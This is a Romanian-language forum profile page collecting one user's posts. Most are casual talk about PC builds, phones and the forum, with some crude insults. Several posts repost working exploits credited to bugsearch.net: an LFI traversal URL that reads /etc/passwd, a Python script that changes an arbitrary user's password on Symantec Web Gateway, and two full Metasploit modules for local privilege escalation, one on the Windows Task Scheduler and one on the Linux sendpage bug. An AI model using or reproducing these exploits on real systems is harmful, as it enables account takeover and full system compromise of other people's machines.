Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. Pt oc serios ai nevoie de un procesor seria K (recomand 2500K sau Ivy bridge) si un cooler cel putin la fel de bun ca al meu. Evita totusi sa folosesti acel zerotherm pe placa de acolo, intr-o configuratie push-pull nu vei putea folosi sloturile 1 si 2 RAM "prietene" Sithalkes.Ram-ul placii video nu inseamna tot,aminteste-ti de latimea de banda prin care e folosita memoria respectiva.Nu toata lumea schimba ca tine de 2 ori pe an.Te-as ruga sa pastram o discutie civilizata. Am recomandat nvidia pentru ca sunt netsuperiori ca si drivere (cum bine spui si tu),compatibilitate sporita cu Intel fata de AMD Radeon.Pana acum am avut doar amd si stiu ce spun.In plus AMD pe linux e cam useless. @vctor: wire management il poti face singur cu putina rabdare si 2 ore la dispozitie.Respecta doar o ordine. MB>CPU>PSU etc
  2. iti recomand configuratia mea: "Sistem echilibrat" - wishlist de Cipry N. (scoti de acolo ce nu iti trebuie,monitor tastaturi etc) iti pot oferi suport,pcu ala e cumparat la inceputul anului,il poti inlocui cu un ivy bridge.Nu te baga pe AMD Radeon din moment ce iti pui procesor intel (din experienta) @ Sithalkes nu mai recomanda aiura ce nu stii (''1-2 giga'' auzi.Pcu nu-l faci in fiecare an si nu pui piese ca pe dacie,mai ales avand in vedere ca bugetul e decent pentru o baza buna a unui pc de gaming med-hi)
  3. e legala treaba asta cu monitorizarea? ps: Muie aluia cu virusu Protv a luat o caruta de bani pt reportaju asta menit sa sperie pe Ionut,jucator de cantar straic si maniac de filme TS
  4. Eu unul sunt de acord cu ce a facut gecko
  5. Esti/te dai designer.Nu te contrazic. Mosad back? +1
  6. +1 pentru cel cu "we don;t care'' dar cu alt slogan.Preferabil "the essence of the future..."
  7. corect.Nu ma asteptam dar inspira surprinzator de multa incredere.O sa-l pun intai pe virtual si probabil voi migra cand va aparea versiunea finala.
  8. -=[--------------------ADVISORY-------------------]=- Ad Manager Pro v. 4 Author: Corrado Liotta Aka CorryL [corryl80[a]gmail.com] -=[-----------------------------------------------]=- -=[+] Application: Ad Manager Pro -=[+] Version: 4 -=[+] Vendor's URL: http://www.phpwebscripts.com/ad-manager-pro/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: LFI -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 -=[+] WebSite: http://corryl80.blogspot.com/ ...::[ Descriprion ]::.. Ad Manager Pro is the most complete ad management solution available. You can use it to manage ads on your site(s), you also can sell clicks, impressions and/or days range to advertisers and purchase clicks and/or impressions from publishers. Features of this quality system may bring you an interesting income. You and your users have a real-time statistic for each ad (hourly, daily, monthly statistic), also a graphical statistic is available. Advertisers and publishers can order daily email reports. Each ad may be used in multiple campaigns, each campaign has its own statistic and configuration. Support for classic banners (gif, jpg, png, swf), plain text/html ads, ads from templates (Google AdWords style). You can display ads on pages or in popup consoles. There are many ways to show ads on pages - javascript, iframe, php include command. It lets you place the ads to any webpage. Option to load a new ad after a given number of seconds. Ads can be targeted by countries,days,hours. ...::[ Bug ]::.. Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. ...::[ Proof Of Concept ]::.. http://remote-server/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ..::[ Disclousure Timeline ]::.. [23/08/2012] - Public Disclousure -- Corrado Liotta A.k.a (CorryL) Admin x0n3-h4ck Italian Security Team Email: corryl80@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 WebSite: http://corryl80.blogspot.com/ sursa:bugsearch.net
  9. #!/usr/bin/python import urllib import urllib2 import re import sys print "[*] ###########################################################" print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change" print "[*] @_Kc57" print "[*] ###########################################################\n" if (len(sys.argv) != 4): print "Usage: poc.py <RHOST> <username> <newpassword>" exit(0) ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] url = "https://%s/spywall/temppassword.php" % (ip) opts = { 'target':'executive_summary.php', 'USERNAME':username, 'password':password, 'password2':password, 'Save':'Save' } print "[*] Sending request to server..." data = urllib.urlencode(opts) request = urllib2.Request(url, data) response = urllib2.urlopen(request) match = re.search('Your new password has been saved', response.read()) if(match): print "[*] Password for %s changed to %s" %(username,password) else: print "[*] Password change failed!" sursa:bugsearch.net
  10. |Sa traiesti si mult si bine si sa bei cum n-ai baut|
  11. daca v-ar fi trebuit pe bune programu ati fi cautat dupa md5 sau filename Youtube Viewer V3!.exe download - 2shared https://www.virustotal.com/file/483fa11c3ef5ef8ffe181827c9b8b1d99e45d3563920363b4e2c773adecb743f/analysis/
  12. Apple iPhone 4 vs. HTC One S - GSMArena.com eu as alege htc
  13. tin sa te contrazic aici: pariez ca in tarile pe care le consideri normale exista discutii de genu.Sau m ai rele.Vezi ''.onion'' Suntem departe de a fi cei mai destepti/cinstiti/onesti/bogati,dar la fel de departe de a fi cei mai prosti/rai/saraci/infractori! (ca natie)
  14. fata seamana mai mult cu E52/E55 spate e71 Fake and GAY!
  15. confirm close topic
  16. vand/schimb cu orice mi se pare interesant (exclus invitatii pe trackere)
  17. ps: incetati sa mai filozofati pe tema asta (incetati ca poate inceteaza si ''ea'' si alte traznai).Deja s-a mers prea departe si nu mai poate fi oprita asa chestia asta .Scopul e unul cat se poate de serios.Zbori din invatamant,nefututo
  18. Nu stiu daca a mai fost postat: zJAzzNzOBMZyyAAB0zhZcg=5cgcTcg=5yOADyAzOBNBOBMZU38ymcg=5yOADyAzOBM7OBNCSfS2OBMZgAJKJ0znaAzYA00zbybzbBJY6vb2OBMZSAAQZA0zbybzbBJQFwS2OBMZSAAQZA0zbybzbBJC6wSzbBWZ6cuz5BgA+3+KkcgCZcg=5Bg=5Bgq2cgZZA+Akw8w6ERzdyg7bBd/xBMqbBTNG GILA "Decat sa-ti mangai mutra aia dezordonata...mai bine fut o carcasa de vaca stricata sub apa"
  19. Thermalright GTX 285/260 VRM heatsinks Cooler VGA - PC Garage autoadezive
  20. Crashoverride tu tre' sa fii tare incuiat baiatule si te crezi prea destept.Ai report din partea mea pentru ca: 1. vanzarile sunt inchide pe rst 2.tentativa de a jecmani/dezinforma
  21. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/post/common' require 'rex' require 'zlib' class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File def initialize(info={}) super(update_info(info, { 'Name' => 'Windows Escalate Task Scheduler XML Privilege Escalation', 'Description' => %q{ This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable. }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision$', 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows Vista, 7, and 2008', {} ], ], 'References' => [ [ 'OSVDB', '68518' ], [ 'CVE', '2010-3338' ], [ 'BID', '44357' ], [ 'MSB', 'MS10-092' ], [ 'EDB', 15589 ] ], 'DisclosureDate'=> 'Sep 13 2010', 'DefaultTarget' => 0 })) register_options([ OptString.new("CMD", [ false, "Command to execute instead of a payload" ]), OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]), ]) end def check vuln = false winver = sysinfo["OS"] affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] affected.each { |v| if winver.include? v vuln = true break end } if not vuln return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit if sysinfo["Architecture"] =~ /wow64/i # # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters # worse, meterpreter/railgun creates things in a new thread, making it much more # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this, # offer a workaround and error out. # print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...") return end if check == Exploit::CheckCode::Safe print_error("#{winver} is not vulnerable.") return end taskname = datastore["TASKNAME"] || nil cmd = datastore["CMD"] || nil upload_fn = nil tempdir = session.fs.file.expand_path("%TEMP%") if not cmd # Get the exe payload. exe = generate_payload_exe #and placing it on the target in %TEMP% tempexename = Rex::Text.rand_text_alpha(rand(8)+6) cmd = tempdir + "\\" + tempexename + ".exe" print_status("Preparing payload at #{cmd}") write_file(cmd, exe) else print_status("Using command: #{cmd}") end # # Create a new task to do our bidding, but make sure it doesn't run. # taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8)) sysdir = session.fs.file.expand_path("%SystemRoot%") taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}" print_status("Creating task: #{taskname}") cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f" # print_debug("Will Execute:\n\t#{cmdline}") exec_schtasks(cmdline, "create the task") # # Read the contents of the newly creates task file # content = read_task_file(taskname, taskfile) # # Double-check that we got what we expect. # if content[0,2] != "\xff\xfe" # # Convert to unicode, since it isn't already # content = content.unpack('C*').pack('v*') else # # NOTE: we strip the BOM here to exclude it from the crc32 calculation # content = content[2,content.length] end # # Record the crc32 for later calculations # old_crc32 = crc32(content) print_status("Original CRC32: 0x%x" % old_crc32) # # Convert the file contents from unicode # content = content.unpack('v*').pack('C*') # # Mangle the contents to now run with SYSTEM privileges # content.gsub!('LeastPrivilege', 'HighestAvailable') content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>') content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>') #content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>') content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"') content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"') content << "<!-- ZZ -->" # # Convert it back to unicode # content = Rex::Text.to_unicode(content) # # Fix it so the CRC matches again # fix_crc32(content, old_crc32) new_crc32 = crc32(content) print_status("Final CRC32: 0x%x" % new_crc32) # # Write the new content back # print_status("Writing our modified content back...") fd = session.fs.file.new(taskfile, "wb") fd.write "\xff\xfe" + content fd.close # # Validate our results # print_status("Validating task: #{taskname}") exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task") # # Run the task # print_status("Disabling the task...") exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task") print_status("Enabling the task...") exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task") print_status("Executing the task...") exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task") # # And delete it. # print_status("Deleting the task...") exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task") end def crc32(data) table = Zlib.crc_table crc = 0xffffffff data.unpack('C*').each { |b| crc = table[(crc & 0xff) ^ b] ^ (crc >> 8) } crc end def fix_crc32(data, old_crc) # # CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably # reversed from Microsoft's code) # bwd_table = [ 0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82, 0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904, 0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF, 0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449, 0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618, 0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E, 0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55, 0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3, 0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7, 0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71, 0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA, 0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C, 0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D, 0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB, 0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820, 0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6, 0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68, 0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE, 0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725, 0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3, 0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2, 0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574, 0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF, 0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839, 0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D, 0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B, 0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450, 0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6, 0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387, 0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601, 0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA, 0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C, 0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717, 0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291, 0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A, 0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC, 0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D, 0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B, 0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0, 0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546, 0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462, 0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4, 0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F, 0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9, 0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8, 0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E, 0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5, 0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633, 0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD, 0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B, 0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0, 0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936, 0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67, 0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1, 0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A, 0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC, 0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288, 0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E, 0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5, 0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43, 0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812, 0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94, 0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F, 0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9 ] crc = crc32(data[0, data.length - 12]) data[-12, 4] = [crc].pack('V') data[-12, 12].unpack('C*').reverse.each { |b| old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ & 0xffffffff } data[-12, 4] = [old_crc].pack('V') end def exec_schtasks(cmdline, purpose) cmdline = "/c #{cmdline.strip} && echo SCHELEVATOR" lns = cmd_exec('cmd.exe', cmdline) success = false lns.each_line { |ln| ln.chomp! if ln =~ /^SUCCESS\:\s/ success = true print_status(ln) else print_status(ln) end } end def read_task_file(taskname, taskfile) print_status("Reading the task file contents from #{taskfile}...") # Can't read the file directly on 2008? content = '' fd = session.fs.file.new(taskfile, "rb") until fd.eof? content << fd.read end fd.close content end end sursa:bugsearch.net
      • 1
      • Upvote
  22. Code: ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' #load 'lib/msf/core/post/file.rb' #load 'lib/msf/core/exploit/local/unix.rb' #load 'lib/msf/core/exploit/local/linux.rb' #load 'lib/msf/core/exploit/local/linux_kernel.rb' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux include Msf::Exploit::Local::Unix def initialize(info={}) super( update_info( info, { 'Name' => 'Linux Kernel Sendpage Local Privilege Escalation', 'Description' => %q{ AKA Wunderbar Emporium }, 'License' => MSF_LICENSE, 'Author' => [ 'spender', # wunderbar_emporium.tgz 'rcvalle', # sock_sendpage.c 'egypt' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2009-2692' ], [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ], [ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ], ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], #[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], ], 'DefaultTarget' => 0, } )) end def exploit sc = Metasm::ELF.new(@cpu) sc.parse %Q| #define DEBUGGING #define NULL ((void*)0) #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx .entrypoint #endif call main ;push eax call exit | # Set up the same include order as the bionic build system. # See external/source/meterpreter/source/bionic/libc/Jamfile cparser.lexer.include_search_path = [ "external/source/meterpreter/source/bionic/libc/include/", "external/source/meterpreter/source/bionic/libc/private/", "external/source/meterpreter/source/bionic/libc/bionic/", "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/", "external/source/meterpreter/source/bionic/libc/kernel/common/", "external/source/meterpreter/source/bionic/libc/arch-x86/include/", ] cparser.parse(%Q| #define DEBUGGING // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h #ifndef __extension__ #define __extension__ #endif // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h // Doing #if on an undefined macro is fine in GCC, but a parse error in // metasm. #ifndef __STDC__ #define __STDC__ 0 #endif #include <sys/types.h> #include <sys/mman.h> #include <stdarg.h> #include <stdio.h> #include <unistd.h> #include <errno.h> /* OpenBSD's strcmp from string/strcmp.c in bionic */ int strcmp(const char *s1, const char *s2) { while (*s1 == *s2++) if (*s1++ == 0) return (0); return (*(unsigned char *)s1 - *(unsigned char *)--s2); } |) [ "external/source/meterpreter/source/bionic/libc/bionic/__errno.c", "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c", "external/source/meterpreter/source/bionic/libc/stdio/stdio.c", "external/source/meterpreter/source/bionic/libc/unistd/mmap.c", # This parses without any trouble, but actually calling perror() causes # immediate segfaults. #"external/source/meterpreter/source/bionic/libc/unistd/perror.c", # For some ungodly reason, NULL ends up being undefined when parsing this # guy, which of course causes parse errors. #"external/source/meterpreter/source/bionic/libc/stdio/mktemp.c", ].each do |fname| print_status("Parsing c file #{fname}") cparser.parse(File.read(fname), fname) end print_status("Unix socket.h") unix_socket_h(sc) current_task_struct_h(sc) case target.arch.first when ARCH_X86 print_status("syscall wrappers") linux_x86_syscall_wrappers(sc) main = %q^ #ifdef __x86_64__ #define PTR_FMT "0x%016x" #else #define PTR_FMT "0x%08x" #endif #define NULL ((void*)0) #define DOMAINS_STOP -1 const int domains[] = { PF_BLUETOOTH, PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25, PF_AX25, PF_BLUETOOTH, PF_PPPOX, DOMAINS_STOP }; int *apparmor_enabled; int got_ring0 = 0; unsigned long uid, gid; static unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[256]; int ret; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) { printf("Unable to obtain symbol listing!\n"); return 0; } } ret = 0; while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf(" [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } static void change_cred(void) { unsigned int *task_struct; task_struct = (unsigned int *)current_task_struct(); while (task_struct) { if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid && task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) { task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] = task_struct[6] = task_struct[7] = 0; break; } task_struct++; } return; } int __attribute__((regparm(3))) own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e) { got_ring0 = 1; if (apparmor_enabled && *apparmor_enabled) { *apparmor_enabled = 0; } change_cred(); return -1; } const char *shellcode = ""; int shellcode_size = 0; int main() { int i = 0; int d; int in_fd, out_fd; char *mapped; char template[] = "/tmp/sendfile.XXXXXX"; int (*func)(); uid = getuid(), gid = getgid(); mapped = mmap(NULL , 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if (mapped == NULL) { printf("Mapped zero page!\n"); } else { exit(1); } // jmp dword near [dword 0x8] mapped[0] = '\xff'; mapped[1] = '\x25'; *(unsigned long *)&mapped[2] = 8; *(unsigned long *)&mapped[8] = (unsigned long)own_the_kernel; for (i = 0; i < 16; i++) { printf("\\\\x%02x", (unsigned char)mapped[i]); } printf("\n"); for (d = 0; domains[d] != DOMAINS_STOP; d++) { //printf("Next domain ... "); out_fd = socket(domains[d], SOCK_DGRAM, 0); if (out_fd > 0) { printf("Got domain[%d]\n", d); break; } if (out_fd < 0) { printf("out_fd: %d, Errno: %d\n", out_fd, errno); exit(1); } } unlink(template); // Couldn't get mkstemp to work, just use open(2) for now in_fd = open(template, O_CREAT | O_RDWR, 0777); printf("Opened temp file: %d\n", in_fd); unlink(template); printf("Calling ftruncate\n"); ftruncate(in_fd, 4096); printf("got_ring0 addr: " PTR_FMT "\n", &got_ring0); printf("Calling sendfile(%d, %d, %d, %d)\n", out_fd, in_fd, NULL, 4096); sendfile(out_fd, in_fd, NULL, 4096); printf("got_ring0: " PTR_FMT ", %d\n", &got_ring0, got_ring0); printf("UID: %d GID: %d\n", getuid(), getgid()); func = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC); // weaksauce memcpy so we don't have to #include <string.h> printf("Copying %d bytes of shellcode\n", shellcode_size); for (i = 0; i < shellcode_size; i++) { (char)func[i] = (char)shellcode[i]; } printf("Calling shellcode: 0x%p\n", func); //sigtrap(); func(); return got_ring0; } ^ main.gsub!(/shellcode =/) do # split the payload into 16-byte chunks and dump it out as a # hex-escaped C string %Q|shellcode =\n"#{payload.encoded.scan(/.{,16}/).map{|c|Rex::Text.to_hex(c,"\\x")}.join(%Q|"\n"|)}"| end main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}") cparser.parse(main, "main.c") asm = cpu.new_ccompiler(cparser, sc).compile sc.parse asm end sc.assemble begin if sc.kind_of? Metasm::ELF elf = sc.encode_string else foo = sc.encode_string elf = Msf::Util::EXE.to_linux_x86_elf(framework, foo) end rescue print_error "Metasm Encoding failed: #{$!}" elog "Metasm Encoding failed: #{$!.class} : #{$!}" elog "Call stack:\n#{$!.backtrace.join("\n")}" return end #puts Rex::Text.to_hex_dump(foo) File.open("payload.bin", "wb") {|fd| fd.write elf } print_status "Writing exploit executable (#{elf.length} bytes)" cmd_exec("rm /tmp/sendpage") write_file("/tmp/sendpage", elf) output = cmd_exec("chmod +x /tmp/sendpage; /tmp/sendpage") output.each_line { |line| print_debug line.chomp } #cmd_exec("rm /tmp/sendpage") end end sursa: bugsearch.net
  23. din moment ce merge pe cosmote prepay ar trebui sa mearga si pe broscoi
  24. depinde de zona,depinde de tehnologia folosita in zona respectiva,depinde de priceperea/graba/lenea celui ce ti-a facut bransamentul,depinde de server si multe altele.In principiu e destul de stabil.In zona mea cand nu erau multi abonati pica o data la 2 ani.acum pica mai des @Gecko nu e dialup e ADSL sau fibra
  25. ca ochii mortului de cateva zile.In rest ok
×
×
  • Create New...